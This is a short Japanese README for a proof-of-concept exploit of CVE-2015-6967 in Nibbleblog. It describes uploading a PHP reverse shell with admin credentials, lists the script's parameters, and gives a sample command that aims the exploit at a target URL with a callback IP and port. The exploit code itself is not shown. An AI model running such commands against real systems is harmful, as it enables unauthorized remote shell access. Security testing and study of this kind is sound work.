
CVE-2015-6967 PoC Exploit
このPythonスクリプトは、Nibbleblog(CVE-2015-6967)の脆弱性を悪用して、脆弱なターゲットにリバースシェルをアップロードします。スクリプトは、ターゲットURL、ユーザー資格情報、およびホストIP/ポートをユーザー入力として受け取り、その後、PHPリバースシェルをアップロードして脆弱性を悪用します。
このスクリプトは教育目的のみを意図しています。違法行為に使用しないでください。所有していない、またはアクセス許可がないシステムで脆弱性をテストまたは悪用する前に、必ず明示的な許可を得てください。
requests ライブラリargparse ライブラリcolorama ライブラリpyfiglet ライブラリ以下のコマンドを使用して必要な依存関係をインストールできます。
pip install requests colorama pyfiglet
スクリプトの実行にはいくつかのパラメータが必要です: url: ターゲットNibbleblogのURL(例:http://10.10.14.14/nibbleblog) -U, --user: Nibbleblogの管理者ユーザー名 -P, --password: Nibbleblogの管理者パスワード -p, --host-port: リバースシェルが接続するローカルポート -H, --host-ip: リバースシェルが接続するローカルIPアドレス
例
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100